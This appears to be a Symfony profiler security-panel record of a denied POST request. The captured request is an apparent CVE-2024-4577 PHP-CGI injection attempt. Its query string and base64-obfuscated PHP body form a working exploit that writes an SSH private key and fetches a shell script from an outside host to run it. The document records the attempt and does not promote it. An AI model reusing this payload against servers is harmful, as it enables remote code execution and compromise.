POST https://217.160.99.120/?%ADd%20allow_url_include%3D1%20%ADd%20auto_prepend_file%3Dphp%3A%2F%2Finput=

Security

Token

There is no security token.

Firewall

main Name
Security enabled
Stateless

Configuration

Key Value
provider security.user.provider.concrete.app_user_provider
context main
entry_point App\Security\UserAuthenticator
user_checker security.user_checker
access_denied_handler (none)
access_denied_url (none)
authenticators
[
  "remember_me"
  "App\Security\UserAuthenticator"
]

Listeners

Listener Duration Response
Symfony\Component\Security\Http\Firewall\ChannelListener {#533
  -map: Symfony\Component\Security\Http\AccessMap {#534 …}
  -logger: Monolog\Logger {#492 …}
  -httpPort: 80
  -httpsPort: 443
}
(none) (none)
Symfony\Component\Security\Http\Firewall\ContextListener {#540
  -sessionKey: "_security_main"
  -registered: false
  -trustResolver: Symfony\Component\Security\Core\Authentication\AuthenticationTrustResolver {#494 …}
  -sessionTrackerEnabler: Symfony\Component\Security\Core\Authentication\Token\Storage\UsageTrackingTokenStorage::enableUsageTracking(): void {#543 …}
  -tokenStorage: Symfony\Component\Security\Core\Authentication\Token\Storage\TokenStorage {#331 …}
  -userProviders: Symfony\Component\DependencyInjection\Argument\RewindableGenerator {#541 …}
  -logger: Monolog\Logger {#492 …}
  -dispatcher: Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher {#488 …}
}
0.18 ms (none)
Symfony\Component\Security\Http\Firewall\AuthenticatorManagerListener {#546
  -authenticatorManager: Symfony\Component\Security\Http\Authentication\AuthenticatorManager {#547 …}
}
(none) (none)
Symfony\Component\Security\Http\Firewall\AccessListener {#572
  -tokenStorage: Symfony\Component\Security\Core\Authentication\Token\Storage\UsageTrackingTokenStorage {#334 …}
  -accessDecisionManager: Symfony\Component\Security\Core\Authorization\TraceableAccessDecisionManager {#336 …}
  -map: Symfony\Component\Security\Http\AccessMap {#534 …}
}
0.48 ms (none)
Symfony\Component\Security\Http\Firewall\LogoutListener {#489
  -options: [
    "csrf_parameter" => "_csrf_token"
    "csrf_token_id" => "logout"
    "logout_path" => "app_logout"
  ]
  -tokenStorage: Symfony\Component\Security\Core\Authentication\Token\Storage\UsageTrackingTokenStorage {#334 …}
  -httpUtils: Symfony\Component\Security\Http\HttpUtils {#499 …}
  -eventDispatcher: Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher {#488 …}
  -csrfTokenManager: null
}
(none) (none)

Authenticators

Status Authenticator
skipped
"App\Security\UserAuthenticator"

This authenticator did not support the request.

skipped
"Symfony\Component\Security\Http\Authenticator\RememberMeAuthenticator"

This authenticator did not support the request.

Access Decision

affirmative Strategy
# Voter class
1
"Symfony\Component\Security\Core\Authorization\Voter\RoleVoter"

Access decision log

# Result Attributes Object
1 DENIED ROLE_ADMIN
Symfony\Component\HttpFoundation\Request {#2
  +attributes: Symfony\Component\HttpFoundation\ParameterBag {#17 …}
  +request: Symfony\Component\HttpFoundation\InputBag {#6 …}
  +query: Symfony\Component\HttpFoundation\InputBag {#12 …}
  +server: Symfony\Component\HttpFoundation\ServerBag {#20 …}
  +files: Symfony\Component\HttpFoundation\FileBag {#19 …}
  +cookies: Symfony\Component\HttpFoundation\InputBag {#18 …}
  +headers: Symfony\Component\HttpFoundation\HeaderBag {#21 …}
  #content: "<?php shell_exec(base64_decode("Y2QgL3RtcCB8fCBjZCAvdmFyL3RtcCB8fCBjZCAvZGV2L3NobTsgZWNobyAnLS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFBQUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUFNd0FBQUF0emMyZ3RaVwpReU5UVXhPUUFBQUNEdmVFdCtKdElWWkdCVkliVmtIdmRrdlFxZE1pYWZ1NS9JTU92ZWxIL3l4Z0FBQUpBdDhGRFJMZkJRCjBRQUFBQXR6YzJndFpXUXlOVFV4T1FBQUFDRHZlRXQrSnRJVlpHQlZJYlZrSHZka3ZRcWRNaWFmdTUvSU1PdmVsSC95eGcKQUFBRUFyMXdsKzNKSGtqQTNadFB0amQ4YkF0TFZGbzEzZVoxMkF3MlFuRlhDL2llOTRTMzRtMGhWa1lGVWh0V1FlOTJTOQpDcDB5SnArN244Z3c2OTZVZi9MR0FBQUFDR1JzY2tCelpuUndBUUlEQkFVPQotLS0tLUVORCBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0nID4ga2V5LnBwazsgZWNobyAnU3RyaWN0SG9zdEtleUNoZWNraW5nIG5vClVzZXJLbm93bkhvc3RzRmlsZSAvZGV2L251bGwnID4gc3NoY2ZnOyBjaG1vZCA0MDAga2V5LnBwazsgc2NwIC1zIC1GIHNzaGNmZyAtaSBrZXkucHBrIGRsckAyMTcuNjAuMTAyLjU6c2ggb3V0X3NoOyBpZiBbICQ/IC1lcSAwIF07IHRoZW4gY2htb2QgK3ggb3V0X3NoOyBzaCBvdXRfc2ggY3ZlXzIwMjRfNDU3NyA+L2Rldi9udWxsIDI+JjE7IGVsc2UgKHdnZXQgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtcU8tIGh0dHBzOi8vMjE3LjYwLjEwMi41L3NoIHx8IGN1cmwgLXNrIGh0dHBzOi8vMjE3LjYwLjEwMi41L3NoKSB8IHNoIC1zIGN2ZV8yMDI0XzQ1Nzc7IGZpOyBybSAtcmYgc3NoY2ZnIGtleS5wcGsgb3V0X3No")); echo(md5("Hello CVE-2024-4577")); ?>"
  #languages: null
  #charsets: null
  #encodings: null
  #acceptableContentTypes: null
  #pathInfo: "/"
  #requestUri: "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
  #baseUrl: ""
  #basePath: null
  #method: "POST"
  #format: null
  #session: Symfony\Component\HttpFoundation\Session\Session {#586 …}
  #locale: null
  #defaultLocale: "en"
  -preferredFormat: null
  -isHostValid: true
  -isForwardedValid: true
  -isSafeContentPreferred: ? bool
  -trustedValuesCache: []
  -isIisRewrite: false
  basePath: ""
  format: "html"
}
"Symfony\Component\Security\Core\Authorization\Voter\RoleVoter"
DENIED
The user doesn't have ROLE_ADMIN.
Show voter details